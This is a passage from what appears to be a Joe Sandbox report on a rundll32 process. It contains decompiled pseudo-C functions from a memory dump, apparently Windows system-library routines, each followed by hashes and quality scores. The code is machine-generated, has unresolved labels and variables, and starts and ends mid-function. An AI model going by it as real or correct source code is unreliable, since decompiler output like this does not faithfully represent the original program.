                                                                                                                					L19:
                                                                                                                					_t107 =  *( *[fs:0x30] + 0x18);
                                                                                                                					__eflags = _t107;
                                                                                                                					if(_t107 == 0) {
                                                                                                                						L60:
                                                                                                                						_t68 = 0xc0000017;
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					_t72 =  *0x44f7b9c; // 0x0
                                                                                                                					_t74 = L04424620(_t107, _t107, _t72 + 0x180000, _t121);
                                                                                                                					_v1064 = _t74;
                                                                                                                					__eflags = _t74;
                                                                                                                					if(_t74 == 0) {
                                                                                                                						goto L60;
                                                                                                                					}
                                                                                                                					_t102 = _t74;
                                                                                                                					_push( &_v1060);
                                                                                                                					_push(_t121);
                                                                                                                					_push(_t74);
                                                                                                                					_push(2);
                                                                                                                					_push( &_v1048);
                                                                                                                					_push(_t116);
                                                                                                                					_t122 = E04449650();
                                                                                                                					__eflags = _t122;
                                                                                                                					if(_t122 >= 0) {
                                                                                                                						L7:
                                                                                                                						_t114 = _a12;
                                                                                                                						__eflags = _t114;
                                                                                                                						if(_t114 != 0) {
                                                                                                                							_t77 = _a20;
                                                                                                                							L26:
                                                                                                                							_t109 =  *(_t102 + 4);
                                                                                                                							__eflags = _t109 - 3;
                                                                                                                							if(_t109 == 3) {
                                                                                                                								L55:
                                                                                                                								__eflags = _t114 - _t109;
                                                                                                                								if(_t114 != _t109) {
                                                                                                                									L59:
                                                                                                                									_t122 = 0xc0000024;
                                                                                                                									L15:
                                                                                                                									_t78 = _v1052;
                                                                                                                									__eflags = _t78;
                                                                                                                									if(_t78 != 0) {
                                                                                                                										L044277F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                                                                                                									}
                                                                                                                									_t68 = _t122;
                                                                                                                									goto L4;
                                                                                                                								}
                                                                                                                								_t110 = _v1056;
                                                                                                                								_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                                								_v1060 = _t118;
                                                                                                                								__eflags = _t110;
                                                                                                                								if(_t110 == 0) {
                                                                                                                									L10:
                                                                                                                									_t122 = 0x80000005;
                                                                                                                									L11:
                                                                                                                									_t81 = _v1040;
                                                                                                                									__eflags = _t81;
                                                                                                                									if(_t81 == 0) {
                                                                                                                										goto L15;
                                                                                                                									}
                                                                                                                									__eflags = _t122;
                                                                                                                									if(_t122 >= 0) {
                                                                                                                										L14:
                                                                                                                										 *_t81 = _t118;
                                                                                                                										goto L15;
                                                                                                                									}
                                                                                                                									__eflags = _t122 - 0x80000005;
                                                                                                                									if(_t122 != 0x80000005) {
                                                                                                                										goto L15;
                                                                                                                									}
                                                                                                                									goto L14;
                                                                                                                								}
                                                                                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                                                                                                								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                                                                                                									goto L10;
                                                                                                                								}
                                                                                                                								_push( *((intOrPtr*)(_t102 + 8)));
                                                                                                                								_t59 = _t102 + 0xc; // 0xc
                                                                                                                								_push(_t110);
                                                                                                                								L54:
                                                                                                                								E0444F3E0();
                                                                                                                								_t125 = _t125 + 0xc;
                                                                                                                								goto L11;
                                                                                                                							}
                                                                                                                							__eflags = _t109 - 7;
                                                                                                                							if(_t109 == 7) {
                                                                                                                								goto L55;
                                                                                                                							}
                                                                                                                							_t118 = 4;
                                                                                                                							__eflags = _t109 - _t118;
                                                                                                                							if(_t109 != _t118) {
                                                                                                                								__eflags = _t109 - 0xb;
                                                                                                                								if(_t109 != 0xb) {
                                                                                                                									__eflags = _t109 - 1;
                                                                                                                									if(_t109 == 1) {
                                                                                                                										__eflags = _t114 - _t118;
                                                                                                                										if(_t114 != _t118) {
                                                                                                                											_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                                											_v1060 = _t118;
                                                                                                                											__eflags = _t118 - _t77;
                                                                                                                											if(_t118 > _t77) {
                                                                                                                												goto L10;
                                                                                                                											}
                                                                                                                											_push(_t118);
                                                                                                                											_t56 = _t102 + 0xc; // 0xc
                                                                                                                											_push(_v1056);
                                                                                                                											goto L54;
                                                                                                                										}
                                                                                                                										__eflags = _t77 - _t118;
                                                                                                                										if(_t77 != _t118) {
                                                                                                                											L34:
                                                                                                                											_t122 = 0xc0000004;
                                                                                                                											goto L15;
                                                                                                                										}
                                                                                                                										_t111 = _v1056;
                                                                                                                										__eflags = _t111 & 0x00000003;
                                                                                                                										if((_t111 & 0x00000003) == 0) {
                                                                                                                											_v1060 = _t118;
                                                                                                                											__eflags = _t111;
                                                                                                                											if(__eflags == 0) {
                                                                                                                												goto L10;
                                                                                                                											}
                                                                                                                											_t42 = _t102 + 0xc; // 0xc
                                                                                                                											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                                                                                                											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                                                                                                											_push(_t111);
                                                                                                                											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                                                                                                											_push(0);
                                                                                                                											_push( &_v1048);
                                                                                                                											_t122 = E044413C0(_t102, _t118, _t122, __eflags);
                                                                                                                											L44:
                                                                                                                											_t118 = _v1072;
                                                                                                                											goto L11;
                                                                                                                										}
                                                                                                                										_t122 = 0x80000002;
                                                                                                                										goto L15;
                                                                                                                									}
                                                                                                                									_t122 = 0xc0000024;
                                                                                                                									goto L44;
                                                                                                                								}
                                                                                                                								__eflags = _t114 - _t109;
                                                                                                                								if(_t114 != _t109) {
                                                                                                                									goto L59;
                                                                                                                								}
                                                                                                                								_t118 = 8;
                                                                                                                								__eflags = _t77 - _t118;
                                                                                                                								if(_t77 != _t118) {
                                                                                                                									goto L34;
                                                                                                                								}
                                                                                                                								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                                                								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                                                									goto L34;
                                                                                                                								}
                                                                                                                								_t112 = _v1056;
                                                                                                                								_v1060 = _t118;
                                                                                                                								__eflags = _t112;
                                                                                                                								if(_t112 == 0) {
                                                                                                                									goto L10;
                                                                                                                								}
                                                                                                                								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                                                								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                                                                                                								goto L11;
                                                                                                                							}
                                                                                                                							__eflags = _t114 - _t118;
                                                                                                                							if(_t114 != _t118) {
                                                                                                                								goto L59;
                                                                                                                							}
                                                                                                                							__eflags = _t77 - _t118;
                                                                                                                							if(_t77 != _t118) {
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                                                                                                							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                                                                                                								goto L34;
                                                                                                                							}
                                                                                                                							_t113 = _v1056;
                                                                                                                							_v1060 = _t118;
                                                                                                                							__eflags = _t113;
                                                                                                                							if(_t113 == 0) {
                                                                                                                								goto L10;
                                                                                                                							}
                                                                                                                							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                                                                                                							goto L11;
                                                                                                                						}
                                                                                                                						_t118 =  *((intOrPtr*)(_t102 + 8));
                                                                                                                						__eflags = _t118 - _a20;
                                                                                                                						if(_t118 <= _a20) {
                                                                                                                							_t114 =  *(_t102 + 4);
                                                                                                                							_t77 = _t118;
                                                                                                                							goto L26;
                                                                                                                						}
                                                                                                                						_v1060 = _t118;
                                                                                                                						goto L10;
                                                                                                                					}
                                                                                                                					__eflags = _t122 - 0x80000005;
                                                                                                                					if(_t122 != 0x80000005) {
                                                                                                                						goto L15;
                                                                                                                					}
                                                                                                                					L044277F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                                                                                                					L18:
                                                                                                                					_t121 = _v1060;
                                                                                                                					goto L19;
                                                                                                                				}
                                                                                                                				_push( &_v1060);
                                                                                                                				_push(0x400);
                                                                                                                				_t102 =  &_v1036;
                                                                                                                				_push(_t102);
                                                                                                                				_push(2);
                                                                                                                				_push( &_v1048);
                                                                                                                				_push(_t116);
                                                                                                                				_t122 = E04449650();
                                                                                                                				if(_t122 >= 0) {
                                                                                                                					__eflags = 0;
                                                                                                                					_v1052 = 0;
                                                                                                                					goto L7;
                                                                                                                				}
                                                                                                                				if(_t122 == 0x80000005) {
                                                                                                                					goto L18;
                                                                                                                				}
                                                                                                                				goto L4;
                                                                                                                			}










































                                                                                                                0x044779c5
                                                                                                                0x044779c7
                                                                                                                0x00000000
                                                                                                                0x044779c7
                                                                                                                0x0440c67a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: acfe260a6783ecee89a3e3dc34614e619e067a6748d616dc02f14285b0866621
                                                                                                                • Instruction ID: 55c7411138995b2c4157329c3b675893e1aab20d168423f2a510773f99dd4fed
                                                                                                                • Opcode Fuzzy Hash: acfe260a6783ecee89a3e3dc34614e619e067a6748d616dc02f14285b0866621
                                                                                                                • Instruction Fuzzy Hash: 2A818FB66042019FEF25CE24C881ABB73A5EB84358F54496FED459B341E730FD46CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E04486DC9(signed int __ecx, void* __edx) {
                                                                                                                				unsigned int _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				char _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v40;
                                                                                                                				char _v44;
                                                                                                                				char _v48;
                                                                                                                				char _v52;
                                                                                                                				char _v56;
                                                                                                                				char _v60;
                                                                                                                				void* _t87;
                                                                                                                				void* _t95;
                                                                                                                				signed char* _t96;
                                                                                                                				signed int _t107;
                                                                                                                				signed int _t136;
                                                                                                                				signed char* _t137;
                                                                                                                				void* _t157;
                                                                                                                				void* _t161;
                                                                                                                				void* _t167;
                                                                                                                				intOrPtr _t168;
                                                                                                                				void* _t174;
                                                                                                                				void* _t175;
                                                                                                                				signed int _t176;
                                                                                                                				void* _t177;
                                                                                                                
                                                                                                                				_t136 = __ecx;
                                                                                                                				_v44 = 0;
                                                                                                                				_t167 = __edx;
                                                                                                                				_v40 = 0;
                                                                                                                				_v36 = 0;
                                                                                                                				_v32 = 0;
                                                                                                                				_v60 = 0;
                                                                                                                				_v56 = 0;
                                                                                                                				_v52 = 0;
                                                                                                                				_v48 = 0;
                                                                                                                				_v16 = __ecx;
                                                                                                                				_t87 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                                                                                                				_t175 = _t87;
                                                                                                                				if(_t175 != 0) {
                                                                                                                					_t11 = _t175 + 0x30; // 0x30
                                                                                                                					 *((short*)(_t175 + 6)) = 0x14d4;
                                                                                                                					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                                                                                                					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                                                                                                					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                                                                                                					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                                                                                                					E04486B4C(_t167, _t11, 0x214,  &_v8);
                                                                                                                					_v12 = _v8 + 0x10;
                                                                                                                					_t95 = E04427D50();
                                                                                                                					_t137 = 0x7ffe0384;
                                                                                                                					if(_t95 == 0) {
                                                                                                                						_t96 = 0x7ffe0384;
                                                                                                                					} else {
                                                                                                                						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                					}
                                                                                                                					_push(_t175);
                                                                                                                					_push(_v12);
                                                                                                                					_push(0x402);
                                                                                                                					_push( *_t96 & 0x000000ff);
                                                                                                                					E04449AE0();
                                                                                                                					_t87 = L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                                                                                                					_t176 = _v16;
                                                                                                                					if((_t176 & 0x00000100) != 0) {
                                                                                                                						_push( &_v36);
                                                                                                                						_t157 = 4;
                                                                                                                						_t87 = E0448795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                                                                                                						if(_t87 >= 0) {
                                                                                                                							_v24 = E0448795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                                                                                                							_v28 = E0448795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                                                                                                							_push( &_v52);
                                                                                                                							_t161 = 5;
                                                                                                                							_t168 = E0448795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                                                                                                							_v20 = _t168;
                                                                                                                							_t107 = L04424620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                                                                                                							_v16 = _t107;
                                                                                                                							if(_t107 != 0) {
                                                                                                                								_v8 = _v8 & 0x00000000;
                                                                                                                								 *(_t107 + 0x20) = _t176;
                                                                                                                								 *((short*)(_t107 + 6)) = 0x14d5;
                                                                                                                								_t47 = _t107 + 0x24; // 0x24
                                                                                                                								_t177 = _t47;
                                                                                                                								E04486B4C( &_v36, _t177, 0xc78,  &_v8);
                                                                                                                								_t51 = _v8 + 4; // 0x4
                                                                                                                								_t178 = _t177 + (_v8 >> 1) * 2;
                                                                                                                								_v12 = _t51;
                                                                                                                								E04486B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                                                								_v12 = _v12 + _v8;
                                                                                                                								E04486B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                                                                                                								_t125 = _v8;
                                                                                                                								_v12 = _v12 + _v8;
                                                                                                                								E04486B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                                                                                                								_t174 = _v12 + _v8;
                                                                                                                								if(E04427D50() != 0) {
                                                                                                                									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                                                                								}
                                                                                                                								_push(_v16);
                                                                                                                								_push(_t174);
                                                                                                                								_push(0x402);
                                                                                                                								_push( *_t137 & 0x000000ff);
                                                                                                                								E04449AE0();
                                                                                                                								L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                                                                                                								_t168 = _v20;
                                                                                                                							}
                                                                                                                							_t87 = L04422400( &_v36);
                                                                                                                							if(_v24 >= 0) {
                                                                                                                								_t87 = L04422400( &_v44);
                                                                                                                							}
                                                                                                                							if(_t168 >= 0) {
                                                                                                                								_t87 = L04422400( &_v52);
                                                                                                                							}
                                                                                                                							if(_v28 >= 0) {
                                                                                                                								return L04422400( &_v60);
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t87;
                                                                                                                			}


                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction ID: 11a9f8b90bbabc505509e8f9bd63c66a6f4f5c54e332fb8368f2047f15ec4640
                                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                • Instruction Fuzzy Hash: F2715F71A00619AFDF10EFA5C944AAEBBB9FF48714F10406EE505A7251DB34FA41CB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0449B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                                                                                                				char _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _t80;
                                                                                                                				signed int _t83;
                                                                                                                				intOrPtr _t89;
                                                                                                                				signed int _t92;
                                                                                                                				signed char _t106;
                                                                                                                				signed int* _t107;
                                                                                                                				intOrPtr _t108;
                                                                                                                				intOrPtr _t109;
                                                                                                                				signed int _t114;
                                                                                                                				void* _t115;
                                                                                                                				void* _t117;
                                                                                                                				void* _t119;
                                                                                                                				void* _t122;
                                                                                                                				signed int _t123;
                                                                                                                				signed int* _t124;
                                                                                                                
                                                                                                                				_t106 = _a12;
                                                                                                                				if((_t106 & 0xfffffffc) != 0) {
                                                                                                                					return 0xc000000d;
                                                                                                                				}
                                                                                                                				if((_t106 & 0x00000002) != 0) {
                                                                                                                					_t106 = _t106 | 0x00000001;
                                                                                                                				}
                                                                                                                				_t109 =  *0x44f7b9c; // 0x0
                                                                                                                				_t124 = L04424620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                                                                                                				if(_t124 != 0) {
                                                                                                                					 *_t124 =  *_t124 & 0x00000000;
                                                                                                                					_t124[1] = _t124[1] & 0x00000000;
                                                                                                                					_t124[4] = _t124[4] & 0x00000000;
                                                                                                                					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                                                                                                						L13:
                                                                                                                						_push(_t124);
                                                                                                                						if((_t106 & 0x00000002) != 0) {
                                                                                                                							_push(0x200);
                                                                                                                							_push(0x28);
                                                                                                                							_push(0xffffffff);
                                                                                                                							_t122 = E04449800();
                                                                                                                							if(_t122 < 0) {
                                                                                                                								L33:
                                                                                                                								if((_t124[4] & 0x00000001) != 0) {
                                                                                                                									_push(4);
                                                                                                                									_t64 =  &(_t124[1]); // 0x4
                                                                                                                									_t107 = _t64;
                                                                                                                									_push(_t107);
                                                                                                                									_push(5);
                                                                                                                									_push(0xfffffffe);
                                                                                                                									E044495B0();
                                                                                                                									if( *_t107 != 0) {
                                                                                                                										_push( *_t107);
                                                                                                                										E044495D0();
                                                                                                                									}
                                                                                                                								}
                                                                                                                								_push(_t124);
                                                                                                                								_push(0);
                                                                                                                								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                                								L37:
                                                                                                                								L044277F0();
                                                                                                                								return _t122;
                                                                                                                							}
                                                                                                                							_t124[4] = _t124[4] | 0x00000002;
                                                                                                                							L18:
                                                                                                                							_t108 = _a8;
                                                                                                                							_t29 =  &(_t124[0x105]); // 0x414
                                                                                                                							_t80 = _t29;
                                                                                                                							_t30 =  &(_t124[5]); // 0x14
                                                                                                                							_t124[3] = _t80;
                                                                                                                							_t123 = 0;
                                                                                                                							_t124[2] = _t30;
                                                                                                                							 *_t80 = _t108;
                                                                                                                							if(_t108 == 0) {
                                                                                                                								L21:
                                                                                                                								_t112 = 0x400;
                                                                                                                								_push( &_v8);
                                                                                                                								_v8 = 0x400;
                                                                                                                								_push(_t124[2]);
                                                                                                                								_push(0x400);
                                                                                                                								_push(_t124[3]);
                                                                                                                								_push(0);
                                                                                                                								_push( *_t124);
                                                                                                                								_t122 = E04449910();
                                                                                                                								if(_t122 != 0xc0000023) {
                                                                                                                									L26:
                                                                                                                									if(_t122 != 0x106) {
                                                                                                                										L40:
                                                                                                                										if(_t122 < 0) {
                                                                                                                											L29:
                                                                                                                											_t83 = _t124[2];
                                                                                                                											if(_t83 != 0) {
                                                                                                                												_t59 =  &(_t124[5]); // 0x14
                                                                                                                												if(_t83 != _t59) {
                                                                                                                													L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                                                                                                												}
                                                                                                                											}
                                                                                                                											_push( *_t124);
                                                                                                                											E044495D0();
                                                                                                                											goto L33;
                                                                                                                										}
                                                                                                                										 *_a16 = _t124;
                                                                                                                										return 0;
                                                                                                                									}
                                                                                                                									if(_t108 != 1) {
                                                                                                                										_t122 = 0;
                                                                                                                										goto L40;
                                                                                                                									}
                                                                                                                									_t122 = 0xc0000061;
                                                                                                                									goto L29;
                                                                                                                								} else {
                                                                                                                									goto L22;
                                                                                                                								}
                                                                                                                								while(1) {
                                                                                                                									L22:
                                                                                                                									_t89 =  *0x44f7b9c; // 0x0
                                                                                                                									_t92 = L04424620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                                                                                                									_t124[2] = _t92;
                                                                                                                									if(_t92 == 0) {
                                                                                                                										break;
                                                                                                                									}
                                                                                                                									_t112 =  &_v8;
                                                                                                                									_push( &_v8);
                                                                                                                									_push(_t92);
                                                                                                                									_push(_v8);
                                                                                                                									_push(_t124[3]);
                                                                                                                									_push(0);
                                                                                                                									_push( *_t124);
                                                                                                                									_t122 = E04449910();
                                                                                                                									if(_t122 != 0xc0000023) {
                                                                                                                										goto L26;
                                                                                                                									}
                                                                                                                									L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                                                                                                								}
                                                                                                                								_t122 = 0xc0000017;
                                                                                                                								goto L26;
                                                                                                                							}
                                                                                                                							_t119 = 0;
                                                                                                                							do {
                                                                                                                								_t114 = _t124[3];
                                                                                                                								_t119 = _t119 + 0xc;
                                                                                                                								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                                                                                                								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                                                                                                								_t123 = _t123 + 1;
                                                                                                                								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                                                                                                							} while (_t123 < _t108);
                                                                                                                							goto L21;
                                                                                                                						}
                                                                                                                						_push(0x28);
                                                                                                                						_push(3);
                                                                                                                						_t122 = E0440A7B0();
                                                                                                                						if(_t122 < 0) {
                                                                                                                							goto L33;
                                                                                                                						}
                                                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                                                						goto L18;
                                                                                                                					}
                                                                                                                					if((_t106 & 0x00000001) == 0) {
                                                                                                                						_t115 = 0x28;
                                                                                                                						_t122 = E0449E7D3(_t115, _t124);
                                                                                                                						if(_t122 < 0) {
                                                                                                                							L9:
                                                                                                                							_push(_t124);
                                                                                                                							_push(0);
                                                                                                                							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                                                                                                							goto L37;
                                                                                                                						}
                                                                                                                						L12:
                                                                                                                						if( *_t124 != 0) {
                                                                                                                							goto L18;
                                                                                                                						}
                                                                                                                						goto L13;
                                                                                                                					}
                                                                                                                					_t15 =  &(_t124[1]); // 0x4
                                                                                                                					_t117 = 4;
                                                                                                                					_t122 = E0449E7D3(_t117, _t15);
                                                                                                                					if(_t122 >= 0) {
                                                                                                                						_t124[4] = _t124[4] | 0x00000001;
                                                                                                                						_v12 = _v12 & 0x00000000;
                                                                                                                						_push(4);
                                                                                                                						_push( &_v12);
                                                                                                                						_push(5);
                                                                                                                						_push(0xfffffffe);
                                                                                                                						E044495B0();
                                                                                                                						goto L12;
                                                                                                                					}
                                                                                                                					goto L9;
                                                                                                                				} else {
                                                                                                                					return 0xc0000017;
                                                                                                                				}
                                                                                                                			}





















                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3a49bd7ba39e88fe0376eaeff9fce3b74b7aff60fe869dcec6c8f30ab831f2f9
                                                                                                                • Instruction ID: a9640a681d340f469597f6cd6bd0dc6da37c540e9aaa74df2b18876d371dc952
                                                                                                                • Opcode Fuzzy Hash: 3a49bd7ba39e88fe0376eaeff9fce3b74b7aff60fe869dcec6c8f30ab831f2f9
                                                                                                                • Instruction Fuzzy Hash: BE71DC32200A41AFEF31CE25D844B56BBE5FB80724F14452EE6558B6A2DB74FD41EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E044052A5(char __ecx) {
                                                                                                                				char _v20;
                                                                                                                				char _v28;
                                                                                                                				char _v29;
                                                                                                                				void* _v32;
                                                                                                                				void* _v36;
                                                                                                                				void* _v37;
                                                                                                                				void* _v38;
                                                                                                                				void* _v40;
                                                                                                                				void* _v46;
                                                                                                                				void* _v64;
                                                                                                                				void* __ebx;
                                                                                                                				intOrPtr* _t49;
                                                                                                                				signed int _t53;
                                                                                                                				short _t85;
                                                                                                                				signed int _t87;
                                                                                                                				signed int _t88;
                                                                                                                				signed int _t89;
                                                                                                                				intOrPtr _t101;
                                                                                                                				intOrPtr* _t102;
                                                                                                                				intOrPtr* _t104;
                                                                                                                				signed int _t106;
                                                                                                                				void* _t108;
                                                                                                                
                                                                                                                				_t93 = __ecx;
                                                                                                                				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                                                                                                				_push(_t88);
                                                                                                                				_v29 = __ecx;
                                                                                                                				_t89 = _t88 | 0xffffffff;
                                                                                                                				while(1) {
                                                                                                                					E0441EEF0(0x44f79a0);
                                                                                                                					_t104 =  *0x44f8210; // 0x352bb8
                                                                                                                					if(_t104 == 0) {
                                                                                                                						break;
                                                                                                                					}
                                                                                                                					asm("lock inc dword [esi]");
                                                                                                                					_t2 = _t104 + 8; // 0x28000000
                                                                                                                					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
                                                                                                                					E0441EB70(_t93, 0x44f79a0);
                                                                                                                					if( *((char*)(_t108 + 0xf)) != 0) {
                                                                                                                						_t101 =  *0x7ffe02dc;
                                                                                                                						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                                						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                                                                                                							L9:
                                                                                                                							_push(0);
                                                                                                                							_push(0);
                                                                                                                							_push(0);
                                                                                                                							_push(0);
                                                                                                                							_push(0x90028);
                                                                                                                							_push(_t108 + 0x20);
                                                                                                                							_push(0);
                                                                                                                							_push(0);
                                                                                                                							_push(0);
                                                                                                                							_t10 = _t104 + 4; // 0x0
                                                                                                                							_push( *_t10);
                                                                                                                							_t53 = E04449890();
                                                                                                                							__eflags = _t53;
                                                                                                                							if(_t53 >= 0) {
                                                                                                                								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                                                                                                								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                                                                                                									E0441EEF0(0x44f79a0);
                                                                                                                									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                                                                                                									E0441EB70(0, 0x44f79a0);
                                                                                                                								}
                                                                                                                								goto L3;
                                                                                                                							}
                                                                                                                							__eflags = _t53 - 0xc0000012;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								L12:
                                                                                                                								_t11 = _t104 + 0xe; // 0x352bd002
                                                                                                                								_t13 = _t104 + 0xc; // 0x352bc5
                                                                                                                								_t93 = _t13;
                                                                                                                								 *((char*)(_t108 + 0x12)) = 0;
                                                                                                                								__eflags = E0443F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
                                                                                                                								if(__eflags >= 0) {
                                                                                                                									L15:
                                                                                                                									_t102 = _v28;
                                                                                                                									 *_t102 = 2;
                                                                                                                									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                                                                									E0441EEF0(0x44f79a0);
                                                                                                                									__eflags =  *0x44f8210 - _t104; // 0x352bb8
                                                                                                                									if(__eflags == 0) {
                                                                                                                										__eflags =  *((char*)(_t108 + 0xe));
                                                                                                                										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                                                                                                										 *0x44f8210 = _t102;
                                                                                                                										_t32 = _t102 + 0xc; // 0x0
                                                                                                                										 *_t95 =  *_t32;
                                                                                                                										_t33 = _t102 + 0x10; // 0x0
                                                                                                                										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                                                                                                										_t35 = _t102 + 4; // 0xffffffff
                                                                                                                										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                                                                                                										if(__eflags != 0) {
                                                                                                                											_t37 = _t104 + 0x10; // 0x2000352b
                                                                                                                											_t95 =  *((intOrPtr*)( *_t37));
                                                                                                                											E04484888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
                                                                                                                										}
                                                                                                                										E0441EB70(_t95, 0x44f79a0);
                                                                                                                										asm("lock xadd [esi], eax");
                                                                                                                										if(__eflags == 0) {
                                                                                                                											_t38 = _t104 + 4; // 0x0
                                                                                                                											_push( *_t38);
                                                                                                                											E044495D0();
